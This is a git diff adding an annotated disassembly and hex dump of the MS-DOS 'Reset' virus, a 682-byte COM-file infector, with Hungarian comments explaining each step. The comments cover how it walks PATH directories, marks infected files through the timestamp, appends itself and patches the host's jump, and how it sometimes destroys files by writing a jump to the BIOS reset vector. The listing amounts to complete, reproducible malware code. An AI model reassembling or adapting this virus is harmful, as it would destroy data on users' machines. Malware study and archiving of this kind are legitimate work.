[BX+SI],AH +114E:0391 0121 ADD [BX+DI],SP +114E:0393 0022 ADD [BP+SI],AH +114E:0395 0000 ADD [BX+SI],AL +114E:0397 005245 ADD [BP+SI+45],DL +114E:039A 53 PUSH BX +114E:039B 45 INC BP 
+114E:039C 54 PUSH SP +114E:039D 2E CS: +114E:039E 43 INC BX +114E:039F 4F DEC DI +114E:03A0 4D DEC BP +114E:03A1 0000 ADD [BX+SI],AL +114E:03A3 4D DEC BP +114E:03A4 00EA ADD DL,CH +114E:03A6 F0 LOCK +114E:03A7 FF00 INC WORD PTR [BX+SI] +114E:03A9 F0 LOCK +114E:03AA 16 PUSH SS +114E:03AB 7C14 JL 03C1 + +Dump list: + +114E:0000 CD 20 00 A0 00 9A F0 FE-1D F0 F4 02 84 0D 2F 03 . ............/. +114E:0010 84 0D BC 02 84 0D 4C 0D-01 03 01 00 02 FF FF FF ......L......... +114E:0020 FF FF FF FF FF FF FF FF-FF FF FF FF 44 11 4C 01 ............D.L. +114E:0030 BE 10 14 00 18 00 4E 11-FF FF FF FF 00 00 00 00 ......N......... +114E:0040 00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00 ................ +114E:0050 CD 21 CB 00 00 00 00 00-00 00 00 00 00 20 20 20 .!........... +114E:0060 20 20 20 20 20 20 20 20-00 00 00 00 00 20 20 20 ..... +114E:0070 20 20 20 20 20 20 20 20-00 00 00 00 00 00 00 00 ........ +114E:0080 01 20 0D 65 73 65 74 76-2E 63 6F 6D 20 0D 63 3A . .esetv.com .c: +114E:0090 0D 65 6B 5C 64 62 61 73-65 3B 63 3A 5C 6E 79 65 .ek\dbase;c:\nye +114E:00A0 6C 76 65 6B 5C 63 6C 69-70 70 65 72 3B 63 3A 5C lvek\clipper;c:\ +114E:00B0 6E 79 65 6C 76 65 6B 5C-66 6C 61 73 68 3B 63 3A nyelvek\flash;c: +114E:00C0 5C 6E 79 65 6C 76 65 6B-5C 70 61 73 63 61 6C 3B \nyelvek\pascal; +114E:00D0 63 3A 5C 75 74 69 6C 0D-00 00 00 00 00 00 00 00 c:\util......... +114E:00E0 00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00 ................ +114E:00F0 00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00 ................ +114E:0100 E9 1F 00 49 60 61 6D 20-61 20 52 65 73 65 74 20 ...I`am a Reset +114E:0110 56 49 52 55 53 21 24 BA-03 01 B4 09 CD 21 B4 00 VIRUS!$......!.. +114E:0120 CD 20 51 BA 1B 03 FC 8B-F2 81 C6 0A 00 BF 00 01 . Q............. +114E:0130 B9 03 00 F3 A4 8B F2 B4-30 CD 21 3C 00 75 03 E9 ........0.!<.u.. +114E:0140 C7 01 06 B4 2F CD 21 89-9C 00 00 8C 84 02 00 07 ..../.!......... +114E:0150 BA 5F 00 90 03 D6 B4 1A-CD 21 06 56 8E 06 2C 00 ._.......!.V..,. 
+114E:0160 BF 00 00 5E 56 81 C6 1A-00 AC B9 00 80 F2 AE B9 ...^V........... +114E:0170 04 00 AC AE 75 ED E2 FA-5E 07 89 BC 16 00 8B FE ....u...^....... +114E:0180 81 C7 1F 00 8B DE 81 C6-1F 00 8B FE EB 3A 83 BC .............:.. +114E:0190 16 00 00 75 03 E9 63 01-1E 56 26 8E 1E 2C 00 8B ...u..c..V&..,.. +114E:01A0 FE 26 8B B5 16 00 81 C7-1F 00 AC 3C 3B 74 0A 3C .&.........<;t.< +114E:01B0 00 74 03 AA EB F4 BE 00-00 5B 1F 89 B7 16 00 80 .t.......[...... +114E:01C0 7D FF 5C 74 03 B0 5C AA-89 BF 18 00 8B F3 81 C6 }.\t..\......... +114E:01D0 10 00 B9 06 00 F3 A4 8B-F3 B4 4E BA 1F 00 90 03 ..........N..... +114E:01E0 D6 B9 03 00 CD 21 EB 04-B4 4F CD 21 73 02 EB 9E .....!...O.!s... +114E:01F0 8B 84 75 00 24 1F 3C 1F-74 EE 81 BC 79 00 00 FA ..u.$.<.t...y... +114E:0200 77 E6 83 BC 79 00 0A 72-DF 8B BC 18 00 56 81 C6 w...y..r.....V.. +114E:0210 7D 00 AC AA 3C 00 75 FA-5E B8 00 43 BA 1F 00 90 }...<.u.^..C.... +114E:0220 03 D6 CD 21 89 8C 08 00-B8 01 43 81 E1 FE FF BA ...!......C..... +114E:0230 1F 00 90 03 D6 CD 21 B8-02 3D BA 1F 00 90 03 D6 ......!..=...... +114E:0240 CD 21 73 03 E9 A5 00 8B-D8 B8 00 57 CD 21 89 8C .!s........W.!.. +114E:0250 04 00 89 94 06 00 B4 2C-CD 21 80 E6 07 75 10 B4 .......,.!...u.. +114E:0260 40 B9 05 00 8B D6 81 C2-8A 00 CD 21 EB 65 90 B4 @..........!.e.. +114E:0270 3F B9 03 00 BA 0A 00 90-03 D6 CD 21 72 55 3D 03 ?..........!rU=. +114E:0280 00 75 50 B8 02 42 B9 00-00 BA 00 00 CD 21 72 43 .uP..B.......!rC +114E:0290 8B C8 2D 03 00 89 84 0E-00 81 C1 F9 02 8B FE 81 ..-............. +114E:02A0 EF F7 01 89 0D B4 40 B9-88 02 8B D6 81 EA F9 01 ......@......... +114E:02B0 CD 21 72 1F 3D 88 02 75-1A B8 00 42 B9 00 00 BA .!r.=..u...B.... +114E:02C0 00 00 CD 21 72 0D B4 40-B9 03 00 8B D6 81 C2 0D ...!r..@........ +114E:02D0 00 CD 21 8B 94 06 00 8B-8C 04 00 81 E1 E0 FF 81 ..!............. +114E:02E0 C9 1F 00 B8 01 57 CD 21-B4 3E CD 21 B8 01 43 8B .....W.!.>.!..C. +114E:02F0 8C 08 00 BA 1F 00 90 03-D6 CD 21 1E B4 1A 8B 94 ..........!..... 
+114E:0300 00 00 8E 9C 02 00 CD 21-1F 59 33 C0 33 DB 33 D2 .......!.Y3.3.3. +114E:0310 33 F6 BF 00 01 57 33 FF-C2 FF FF 80 00 46 0D 20 3....W3......F. +114E:0320 01 21 00 20 00 EB 15 90-E9 1F 00 2A 2E 43 4F 4D .!. .......*.COM +114E:0330 00 28 00 47 03 50 41 54-48 3D 52 45 53 45 54 2E .(.G.PATH=RESET. +114E:0340 43 4F 4D 00 00 00 00 4D-00 44 49 54 2E 43 4F 4D COM....M.DIT.COM +114E:0350 00 00 20 20 20 20 20 20-20 20 20 20 20 20 20 20 .. +114E:0360 20 20 20 20 20 20 20 20-20 20 20 20 20 20 20 20 +114E:0370 20 20 20 20 20 20 20 20-20 20 01 3F 3F 3F 3F 3F .????? +114E:0380 3F 3F 3F 43 4F 4D 03 01-00 00 00 2E 8B 26 68 20 ???COM.......&h +114E:0390 20 01 21 00 22 00 00 00-52 45 53 45 54 2E 43 4F .!."...RESET.CO +114E:03A0 4D 00 00 4D 00 EA F0 FF-00 F0 16 7C 14 M..M.......|. + + \ No newline at end of file diff --git a/MSDOS/Virus.MSDOS.Unknown.v_dos625.lst b/MSDOS/Virus.MSDOS.Unknown.v_dos625.lst new file mode 100644 index 00000000..f5174385 --- /dev/null +++ b/MSDOS/Virus.MSDOS.Unknown.v_dos625.lst 
@@ -0,0 +1,571 @@ +Reset virus. Size 682 byte Hex: 02ac byte. Comment by Leslie Kovari + (41) 21-033 + + + +Unassemble list: + +114E:0100 E91F00 JMP 0122 ;ugras a virus kezdetere +114E:0103 49 DEC CX +114E:0104 60 DB 60 +114E:0105 61 DB 61 +114E:0106 6D DB 6D +114E:0107 206120 AND [BX+DI+20],AH +114E:010A 52 PUSH DX +114E:010B 65 DB 65 +114E:010C 7365 JNB 0173 +114E:010E 7420 JZ 0130 +114E:0110 56 PUSH SI +114E:0111 49 DEC CX +114E:0112 52 PUSH DX +114E:0113 55 PUSH BP +114E:0114 53 PUSH BX +114E:0115 2124 AND [SI],SP +114E:0117 BA0301 MOV DX,0103 ;az eredeti fertozott + ;program kezdete +114E:011A B409 MOV AH,09 +114E:011C CD21 INT 21 ;uzenet kepernyore +114E:011E B400 MOV AH,00 +114E:0120 CD20 INT 20 ;exit to DOS + +114E:0122 51 PUSH CX ;stack-en marad + + ;a kovetkezo utasitas operandusat fertozeskor + ;allitja be, igy mindig a helyes cimre mutat + +114E:0123 BA1B03 MOV DX,031B +114E:0126 FC CLD ;elore +114E:0127 8BF2 MOV SI,DX +114E:0129 81C60A00 ADD SI,000A ;SI=031b eredeti 3 byte +114E:012D BF0001 MOV DI,0100 ;program eleje +114E:0130 B90300 MOV CX,0003 ;3 byte +114E:0133 F3 REPZ +114E:0134 A4 MOVSB ;eredeti JMP 117 + ;visszamasolasa +114E:0135 8BF2 MOV SI,DX +114E:0137 B430 MOV AH,30 +114E:0139 CD21 INT 21 ;DOS verzio szam lekerd. +114E:013B 3C00 CMP AL,00 +114E:013D 7503 JNZ 0142 +114E:013F E9C701 JMP 0309 ;ha 00-as verzio akkor + ;nem fertoz a virus s + ;futtatja az eredeti + ;programot +114E:0142 06 PUSH ES +114E:0143 B42F MOV AH,2F +114E:0145 CD21 INT 21 ;DTA. lekerdezese +114E:0147 899C0000 MOV [SI+0000],BX ;BX= 0080 offset +114E:014B 8C840200 MOV [SI+0002],ES ;eredeti DTA. mentese +114E:014F 07 POP ES + + ;DTA. beallitasa az ENTRY cimere /dir.-bol/ + ;ide masolja a find first a file adatait + +114E:0150 BA5F00 MOV DX,005F ;DX=037a +114E:0153 90 NOP +114E:0154 03D6 ADD DX,SI +114E:0156 B41A MOV AH,1A +114E:0158 CD21 INT 21 ;DTA. 
letrehozasa + ;037a-tol uj cimre +114E:015A 06 PUSH ES +114E:015B 56 PUSH SI +114E:015C 8E062C00 MOV ES,[002C] ;kornyezet szegmense +114E:0160 BF0000 MOV DI,0000 ;elejetol ES:DI fog a + ;kovetkezo dir.-ra mu- + ;tatni +114E:0163 5E POP SI +114E:0164 56 PUSH SI +114E:0165 81C61A00 ADD SI,001A ;ezen a cimen levo + ;stringet keresi a + ;kornyezetbe PATH +114E:0169 AC LODSB ;AL=DS:[SI],SI++ +114E:016A B90080 MOV CX,8000 ;32 kbyte +114E:016D F2 REPNZ +114E:016E AE SCASB ;megkeresi a kovetke- + ;zo P betut +114E:016F B90400 MOV CX,0004 ;a PATH feliratot keresi +114E:0172 AC LODSB +114E:0173 AE SCASB ;betunkent hasonlitja +114E:0174 75ED JNZ 0163 ;ha nem egyezik a DI. + ;karakter /kov.betu/ +114E:0176 E2FA LOOP 0172 ;egyezik beolvassa es + ;osszehasonlitja a tobbi + ;betut is +114E:0178 5E POP SI +114E:0179 07 POP ES ;ES:DI mutat az elso + ;PATH-ra +114E:017A 89BC1600 MOV [SI+0016],DI ;a PATH= szo utani file + ;spec. cimenek mentese + ;PATH mutato +114E:017E 8BFE MOV DI,SI ;SI=031b +114E:0180 81C71F00 ADD DI,001F ;DI=033a +114E:0184 8BDE MOV BX,SI ;BX=031b ezutan BX mu- + ;tat az adatokra +114E:0186 81C61F00 ADD SI,001F ;SI=033a +114E:018A 8BFE MOV DI,SI ;DI=033a +114E:018C EB3A JMP 01C8 + + ;A kovetkezo PATH-ban megadott aldirectoryt + ;File Path-ra masolja, igy a kovetkezo file-t + ;ebben az aldirectoryban keresi + +114E:018E 83BC160000 CMP WORD PTR [SI+0016],+00 ; +114E:0193 7503 JNZ 0198 +114E:0195 E96301 JMP 02FB ;ha nincs osveny megadva +114E:0198 1E PUSH DS +114E:0199 56 PUSH SI +114E:019A 26 ES: +114E:019B 8E1E2C00 MOV DS,[002C] ;kornyezet szegmense +114E:019F 8BFE MOV DI,SI ;DI=033a +114E:01A1 26 ES: +114E:01A2 8BB51600 MOV SI,[DI+0016] ;a kornyezetbol a path + ;masolasa ha az aktualis + ;konyvtarban nem talalt + ;fertozheto file-t + ;a PATH= utanra mutat + ;az SI +114E:01A6 81C71F00 ADD DI,001F +114E:01AA AC LODSB ;beolvas a kornyezetbol + ;a 0029. byte-ot +114E:01AB 3C3B CMP AL,3B ;pontosvesszo ? 
+114E:01AD 740A JZ 01B9 ;igen +114E:01AF 3C00 CMP AL,00 ;PATH vege ? nem lesz + ;tobb +114E:01B1 7403 JZ 01B6 ;igen +114E:01B3 AA STOSB ;letarol 033a-tol +114E:01B4 EBF4 JMP 01AA + +114E:01B6 BE0000 MOV SI,0000 +114E:01B9 5B POP BX ;BX=regi SI BX mutat + ;az adatokra +114E:01BA 1F POP DS +114E:01BB 89B71600 MOV [BX+0016],SI + + ;a kovetkezo PATH-ban adott dir. mar atmasolva + +114E:01BF 807DFF5C CMP BYTE PTR [DI-01],5C ; \ jel ? +114E:01C3 7403 JZ 01C8 ;igen +114E:01C5 B05C MOV AL,5C ;egyebkent \ iras + + ;egy aldir. kiertekelese, eloszor az aktualis, majd + ;a file path -ra masolt aldir. vegignezese, fertozes + ;DI a file path-ba irt aldir. neve utani poz.-ra mu- + ;tat + + ;COM file keresese + +114E:01C7 AA STOSB ;\ jel beirasa +114E:01C8 89BF1800 MOV [BX+0018],DI ;ide kell majd a + ;file nevet masolni, + ;az aldir. neve utan +114E:01CC 8BF3 MOV SI,BX ;SI=031b DI=033d +114E:01CE 81C61000 ADD SI,0010 ;SI=032b +114E:01D2 B90600 MOV CX,0006 +114E:01D5 F3 REPZ +114E:01D6 A4 MOVSB ;a *.COM szoveg beirasa + ;a PATH= szoveg utan +114E:01D7 8BF3 MOV SI,BX +114E:01D9 B44E MOV AH,4E ;a file adatai a DTA. + ;alltal foglalt teru- + ;letre +114E:01DB BA1F00 MOV DX,001F +114E:01DE 90 NOP +114E:01DF 03D6 ADD DX,SI +114E:01E1 B90300 MOV CX,0003 +114E:01E4 CD21 INT 21 ;elso file bejegyzes ke- + ;resese, az it. aktivi- + ;zalasa utan felhozza a + ;filemeretet, attrib.ot + ;keletkezes datumat s + ;idejet is! +114E:01E6 EB04 JMP 01EC ;vizsgalatra +114E:01E8 B44F MOV AH,4F +114E:01EA CD21 INT 21 ;kovetkezo file bejegy- + ;zes keresese +114E:01EC 7302 JNB 01F0 ;ha nincs hiba +114E:01EE EB9E JMP 018E ;hiba eseten -ha nem + ;talal tobb COM file-t + ;mas aldirt keres + ;mar talalt COM file-t, az adataival az entry fel + ;van toltve, a file ellenorzese es fertozese + ;kovetkezik + +114E:01F0 8B847500 MOV AX,[SI+0075] ;a keletkezesi ido AX-be + ;SI=0390 +114E:01F4 241F AND AL,1F ;maszk 31 -el +114E:01F6 3C1F CMP AL,1F ;ha 31 akkor mar ferto- + ;zott a file! 
+114E:01F8 74EE JZ 01E8 ;fertozott kovetkezo + ;file-t keresi +114E:01FA 81BC790000FA CMP WORD PTR [SI+0079],FA00 +114E:0200 77E6 JA 01E8 ;ha > a file meret + ;64000 byte-nal +114E:0202 83BC79000A CMP WORD PTR [SI+0079],+0A +114E:0207 72DF JB 01E8 ;ha < 10 byte nal +114E:0209 8BBC1800 MOV DI,[SI+0018] ;DI=033a + + ;megvan a kivalasztott file + ;a file nevet a filespec utan kell masolni + +114E:020D 56 PUSH SI ;DI mutat a filespec.re, + ;PATH=*.COM +114E:020E 81C67D00 ADD SI,007D ;SI=0398 + +114E:0212 AC LODSB ;atmasolja a filenevet + ;/megkeresett elso v. + ;x.edik bejegyzest/ +114E:0213 AA STOSB +114E:0214 3C00 CMP AL,00 ;vegere ert ? nevle- + ;zaro nullaig masol +114E:0216 75FA JNZ 0212 ;nem +114E:0218 5E POP SI ;SI ujra az adatokra mu- + ;tat + ;a file egyes eredeti informacioinak megorzese + ;hogy a fertozese ne tunjon fel + ;minek a file ATTR. megegyszer lekerdezni? + +114E:0219 B80043 MOV AX,4300 +114E:021C BA1F00 MOV DX,001F ;DS:DX = filespec. +114E:021F 90 NOP +114E:0220 03D6 ADD DX,SI ;DX=031b +114E:0222 CD21 INT 21 ;attributum lekerdezese + ;7.6.5.4.3.2.1.0. + ;x x a d v s h r +114E:0224 898C0800 MOV [SI+0008],CX ;attributum +114E:0228 B80143 MOV AX,4301 +114E:022B 81E1FEFF AND CX,FFFE ;ha Read Only akkor ARC. + ;ra valtoztatja +114E:022F BA1F00 MOV DX,001F +114E:0232 90 NOP +114E:0233 03D6 ADD DX,SI ;DX=033a +114E:0235 CD21 INT 21 ;attributum beallitasa + + ;file nyitasa + +114E:0237 B8023D MOV AX,3D02 +114E:023A BA1F00 MOV DX,001F +114E:023D 90 NOP +114E:023E 03D6 ADD DX,SI ;DS:DX = filespec. 
+114E:0240 CD21 INT 21 ;file nyitasa I/O ra +114E:0242 7303 JNB 0247 +114E:0244 E9A500 JMP 02EC ;hiba eseten nincs + ;fertozes +114E:0247 8BD8 MOV BX,AX ;handle + + ;a file idejenek lekerdezese de ez is megtalalhato az + ;ENTRY teruleten + +114E:0249 B80057 MOV AX,5700 +114E:024C CD21 INT 21 ;file letrehozasi datum + ;es ido bekerese +114E:024E 898C0400 MOV [SI+0004],CX ;ido CH-ora CL-perc + DH-sec DL-1/100 +114E:0252 89940600 MOV [SI+0006],DX ;datum +114E:0256 B42C MOV AH,2C +114E:0258 CD21 INT 21 ;rendszerido bekerese + + ;annak eldontese hogy a filet tonkretegye-e + ;ha a masodperc 7 akkor tonkreteszi /aktualis/ + +114E:025A 80E607 AND DH,07 ;sec = 7 ? +114E:025D 7510 JNZ 026F ;nem - nem tesz tonkre! + + ;file tonkretetele + +114E:025F B440 MOV AH,40 +114E:0261 B90500 MOV CX,0005 +114E:0264 8BD6 MOV DX,SI ;reset +114E:0266 81C28A00 ADD DX,008A ;DX=03a7 : JMP F000:FFF0 +114E:026A CD21 INT 21 ;file elejere ir 5 byte + ;-ot a RESET re ugrast! +114E:026C EB65 JMP 02D3 + +114E:026E 90 NOP + + ;fertozes + ;az eredeti 3 byte megorzese hogy kesobb meg futtatni + ;lehessen + +114E:026F B43F MOV AH,3F +114E:0271 B90300 MOV CX,0003 +114E:0274 BA0A00 MOV DX,000A +114E:0277 90 NOP +114E:0278 03D6 ADD DX,SI ;DS:DX = puffer cima DTA +114E:027A CD21 INT 21 ;a program eredeti elso + ;3 byte-jat beolvassa +114E:027C 7255 JB 02D3 ;ha hiba van +114E:027E 3D0300 CMP AX,0003 ;megvolt a 3 byte ? +114E:0281 7550 JNZ 02D3 ;nem + + ;file vegere allas az uj cimek kiszamitasa + +114E:0283 B80242 MOV AX,4202 +114E:0286 B90000 MOV CX,0000 +114E:0289 BA0000 MOV DX,0000 +114E:028C CD21 INT 21 ;file vegere pozicional +114E:028E 7243 JB 02D3 ;ha hiba volt -nem + ;nagyon lehet hiba! 
+ + ;file elejere irando JMP operandus kiszamitasa + +114E:0290 8BC8 MOV CX,AX ;AX-ben filehossz +114E:0292 2D0300 SUB AX,0003 ;AX-ben eltolas a JMP + ;utasitashoz amit a + ;file elejere fog irni + ;igy a JMP a file mos- + ;tani vege utani bytera + ;fog mutatni +114E:0295 89840E00 MOV [SI+000E],AX ;JMP cim + + ;az uj file-on beluli adatterulet cimenek ki- + ;szamitasa es beallitasa + +114E:0299 81C1F902 ADD CX,02F9 ;az uj file-on beluli + ;adatteruletre mutat +114E:029D 8BFE MOV DI,SI +114E:029F 81EFF701 SUB DI,01F7 ;virus elso utasitasa- + ;nak operandusanak + ;cime +114E:02A3 890D MOV [DI],CX ;ide irja az adatterulet + ;cimet + + ;file moge masolja magat + ;filemutato a file vegere mutat + +114E:02A5 B440 MOV AH,40 +114E:02A7 B98802 MOV CX,0288 ;a VIRUS hossza +114E:02AA 8BD6 MOV DX,SI ;virus elso bytejara + ;mutat +114E:02AC 81EAF901 SUB DX,01F9 +114E:02B0 CD21 INT 21 ;a FERTOZES onmagat a + ;program a fertozendo + ;program moge irja +114E:02B2 721F JB 02D3 ;hiba eseten +114E:02B4 3D8802 CMP AX,0288 ;kiirta onmagat ? +114E:02B7 751A JNZ 02D3 ;igen + + ;az elso 3 byte atallitasa, egy file + ;vegere mutato ugro utasitasra + +114E:02B9 B80042 MOV AX,4200 +114E:02BC B90000 MOV CX,0000 +114E:02BF BA0000 MOV DX,0000 +114E:02C2 CD21 INT 21 ;file pointer a vegere +114E:02C4 720D JB 02D3 ;ha volt hiba -nem le- + ;het hiba! +114E:02C6 B440 MOV AH,40 +114E:02C8 B90300 MOV CX,0003 +114E:02CB 8BD6 MOV DX,SI +114E:02CD 81C20D00 ADD DX,000D ;DX=0329 ugro utasitasra + ;mutat +114E:02D1 CD21 INT 21 ;3 byte kiirasa a fileba + + ;az eredeti ido -mar a fertozesjelzessel egyutt- + ;visszaallitasa + +114E:02D3 8B940600 MOV DX,[SI+0006] ;datum +114E:02D7 8B8C0400 MOV CX,[SI+0004] ;ido +114E:02DB 81E1E0FF AND CX,FFE0 ;sec=0 -felesleges! +114E:02DF 81C91F00 OR CX,001F ;sec=1f azaz 31, igy + ;jelzi hogy mar ferto- + ;zott egy file a SEC. + ;-et 31-re allitja a + ;file bejegyzesben + ; hour | min. | sec. 
+ ;1111 1|111 111|0 0000 +114E:02E3 B80157 MOV AX,5701 +114E:02E6 CD21 INT 21 ;file keletk. ido beall. + + ;file zarasa + +114E:02E8 B43E MOV AH,3E +114E:02EA CD21 INT 21 ;file zarasa + + ;eredeti attributum visszaallitasa + +114E:02EC B80143 MOV AX,4301 +114E:02EF 8B8C0800 MOV CX,[SI+0008] ;CX=0020 /ARC./ +114E:02F3 BA1F00 MOV DX,001F +114E:02F6 90 NOP + + ;DTA. visszaallitasa az eredeti cimre + +114E:02F7 03D6 ADD DX,SI +114E:02F9 CD21 INT 21 ;file attr. beallitasa +114E:02FB 1E PUSH DS +114E:02FC B41A MOV AH,1A +114E:02FE 8B940000 MOV DX,[SI+0000] +114E:0302 8E9C0200 MOV DS,[SI+0002] +114E:0306 CD21 INT 21 ;DTA. megadasa +114E:0308 1F POP DS + + ;az eredeti program futtatasa + +114E:0309 59 POP CX +114E:030A 33C0 XOR AX,AX ;reg. nullazasa +114E:030C 33DB XOR BX,BX +114E:030E 33D2 XOR DX,DX +114E:0310 33F6 XOR SI,SI +114E:0312 BF0001 MOV DI,0100 +114E:0315 57 PUSH DI ;elteszi a 0100 offsetet + ;hogy a RET elo tudja + ;venni es odaugrik +114E:0316 33FF XOR DI,DI +114E:0318 C2FFFF RET FFFF ;ugras a 0100-as offset- + ;re, ott mar az eredeti + ;JMP 117 utasitas van, + ;igy vegrehajtodik az + ;eredeti prg. + ;SP- hogy minek ? 
+114E:031B 800046 ADD BYTE PTR [BX+SI],46 +114E:031E 0D2001 OR AX,0120 +114E:0321 2100 AND [BX+SI],AX +114E:0323 2000 AND [BX+SI],AL +114E:0325 EB15 JMP 033C +114E:0327 90 NOP +114E:0328 E91F00 JMP 034A +114E:032B 2A2E434F SUB CH,[4F43] +114E:032F 4D DEC BP +114E:0330 0028 ADD [BX+SI],CH +114E:0332 004703 ADD [BX+03],AL +114E:0335 50 PUSH AX +114E:0336 41 INC CX +114E:0337 54 PUSH SP +114E:0338 48 DEC AX +114E:0339 3D5245 CMP AX,4552 +114E:033C 53 PUSH BX +114E:033D 45 INC BP +114E:033E 54 PUSH SP +114E:033F 2E CS: +114E:0340 43 INC BX +114E:0341 4F DEC DI +114E:0342 4D DEC BP +114E:0343 0000 ADD [BX+SI],AL +114E:0345 0000 ADD [BX+SI],AL +114E:0347 4D DEC BP +114E:0348 004449 ADD [SI+49],AL +114E:034B 54 PUSH SP +114E:034C 2E CS: +114E:034D 43 INC BX +114E:034E 4F DEC DI +114E:034F 4D DEC BP +114E:0350 0000 ADD [BX+SI],AL +114E:0352 2020 AND [BX+SI],AH +114E:0354 2020 AND [BX+SI],AH +114E:0356 2020 AND [BX+SI],AH +114E:0358 2020 AND [BX+SI],AH +114E:035A 2020 AND [BX+SI],AH +114E:035C 2020 AND [BX+SI],AH +114E:035E 2020 AND [BX+SI],AH +114E:0360 2020 AND [BX+SI],AH +114E:0362 2020 AND [BX+SI],AH +114E:0364 2020 AND [BX+SI],AH +114E:0366 2020 AND [BX+SI],AH +114E:0368 2020 AND [BX+SI],AH +114E:036A 2020 AND [BX+SI],AH +114E:036C 2020 AND [BX+SI],AH +114E:036E 2020 AND [BX+SI],AH +114E:0370 2020 AND [BX+SI],AH +114E:0372 2020 AND [BX+SI],AH +114E:0374 2020 AND [BX+SI],AH +114E:0376 2020 AND [BX+SI],AH +114E:0378 2020 AND [BX+SI],AH +114E:037A 013F ADD [BX],DI +114E:037C 3F AAS +114E:037D 3F AAS +114E:037E 3F AAS +114E:037F 3F AAS +114E:0380 3F AAS +114E:0381 3F AAS +114E:0382 3F AAS +114E:0383 43 INC BX +114E:0384 4F DEC DI +114E:0385 4D DEC BP +114E:0386 0301 ADD AX,[BX+DI] +114E:0388 0000 ADD [BX+SI],AL +114E:038A 002E8B26 ADD [268B],CH +114E:038E 68 DB 68 +114E:038F 2020 AND [BX+SI],AH +114E:0391 0121 ADD [BX+DI],SP +114E:0393 0022 ADD [BP+SI],AH +114E:0395 0000 ADD [BX+SI],AL +114E:0397 005245 ADD [BP+SI+45],DL +114E:039A 53 PUSH BX +114E:039B 45 INC BP 
+114E:039C 54 PUSH SP +114E:039D 2E CS: +114E:039E 43 INC BX +114E:039F 4F DEC DI +114E:03A0 4D DEC BP +114E:03A1 0000 ADD [BX+SI],AL +114E:03A3 4D DEC BP +114E:03A4 00EA ADD DL,CH +114E:03A6 F0 LOCK +114E:03A7 FF00 INC WORD PTR [BX+SI] +114E:03A9 F0 LOCK +114E:03AA 16 PUSH SS +114E:03AB 7C14 JL 03C1 + +Dump list: + +114E:0000 CD 20 00 A0 00 9A F0 FE-1D F0 F4 02 84 0D 2F 03 . ............/. +114E:0010 84 0D BC 02 84 0D 4C 0D-01 03 01 00 02 FF FF FF ......L......... +114E:0020 FF FF FF FF FF FF FF FF-FF FF FF FF 44 11 4C 01 ............D.L. +114E:0030 BE 10 14 00 18 00 4E 11-FF FF FF FF 00 00 00 00 ......N......... +114E:0040 00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00 ................ +114E:0050 CD 21 CB 00 00 00 00 00-00 00 00 00 00 20 20 20 .!........... +114E:0060 20 20 20 20 20 20 20 20-00 00 00 00 00 20 20 20 ..... +114E:0070 20 20 20 20 20 20 20 20-00 00 00 00 00 00 00 00 ........ +114E:0080 01 20 0D 65 73 65 74 76-2E 63 6F 6D 20 0D 63 3A . .esetv.com .c: +114E:0090 0D 65 6B 5C 64 62 61 73-65 3B 63 3A 5C 6E 79 65 .ek\dbase;c:\nye +114E:00A0 6C 76 65 6B 5C 63 6C 69-70 70 65 72 3B 63 3A 5C lvek\clipper;c:\ +114E:00B0 6E 79 65 6C 76 65 6B 5C-66 6C 61 73 68 3B 63 3A nyelvek\flash;c: +114E:00C0 5C 6E 79 65 6C 76 65 6B-5C 70 61 73 63 61 6C 3B \nyelvek\pascal; +114E:00D0 63 3A 5C 75 74 69 6C 0D-00 00 00 00 00 00 00 00 c:\util......... +114E:00E0 00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00 ................ +114E:00F0 00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00 ................ +114E:0100 E9 1F 00 49 60 61 6D 20-61 20 52 65 73 65 74 20 ...I`am a Reset +114E:0110 56 49 52 55 53 21 24 BA-03 01 B4 09 CD 21 B4 00 VIRUS!$......!.. +114E:0120 CD 20 51 BA 1B 03 FC 8B-F2 81 C6 0A 00 BF 00 01 . Q............. +114E:0130 B9 03 00 F3 A4 8B F2 B4-30 CD 21 3C 00 75 03 E9 ........0.!<.u.. +114E:0140 C7 01 06 B4 2F CD 21 89-9C 00 00 8C 84 02 00 07 ..../.!......... +114E:0150 BA 5F 00 90 03 D6 B4 1A-CD 21 06 56 8E 06 2C 00 ._.......!.V..,. 
+114E:0160 BF 00 00 5E 56 81 C6 1A-00 AC B9 00 80 F2 AE B9 ...^V........... +114E:0170 04 00 AC AE 75 ED E2 FA-5E 07 89 BC 16 00 8B FE ....u...^....... +114E:0180 81 C7 1F 00 8B DE 81 C6-1F 00 8B FE EB 3A 83 BC .............:.. +114E:0190 16 00 00 75 03 E9 63 01-1E 56 26 8E 1E 2C 00 8B ...u..c..V&..,.. +114E:01A0 FE 26 8B B5 16 00 81 C7-1F 00 AC 3C 3B 74 0A 3C .&.........<;t.< +114E:01B0 00 74 03 AA EB F4 BE 00-00 5B 1F 89 B7 16 00 80 .t.......[...... +114E:01C0 7D FF 5C 74 03 B0 5C AA-89 BF 18 00 8B F3 81 C6 }.\t..\......... +114E:01D0 10 00 B9 06 00 F3 A4 8B-F3 B4 4E BA 1F 00 90 03 ..........N..... +114E:01E0 D6 B9 03 00 CD 21 EB 04-B4 4F CD 21 73 02 EB 9E .....!...O.!s... +114E:01F0 8B 84 75 00 24 1F 3C 1F-74 EE 81 BC 79 00 00 FA ..u.$.<.t...y... +114E:0200 77 E6 83 BC 79 00 0A 72-DF 8B BC 18 00 56 81 C6 w...y..r.....V.. +114E:0210 7D 00 AC AA 3C 00 75 FA-5E B8 00 43 BA 1F 00 90 }...<.u.^..C.... +114E:0220 03 D6 CD 21 89 8C 08 00-B8 01 43 81 E1 FE FF BA ...!......C..... +114E:0230 1F 00 90 03 D6 CD 21 B8-02 3D BA 1F 00 90 03 D6 ......!..=...... +114E:0240 CD 21 73 03 E9 A5 00 8B-D8 B8 00 57 CD 21 89 8C .!s........W.!.. +114E:0250 04 00 89 94 06 00 B4 2C-CD 21 80 E6 07 75 10 B4 .......,.!...u.. +114E:0260 40 B9 05 00 8B D6 81 C2-8A 00 CD 21 EB 65 90 B4 @..........!.e.. +114E:0270 3F B9 03 00 BA 0A 00 90-03 D6 CD 21 72 55 3D 03 ?..........!rU=. +114E:0280 00 75 50 B8 02 42 B9 00-00 BA 00 00 CD 21 72 43 .uP..B.......!rC +114E:0290 8B C8 2D 03 00 89 84 0E-00 81 C1 F9 02 8B FE 81 ..-............. +114E:02A0 EF F7 01 89 0D 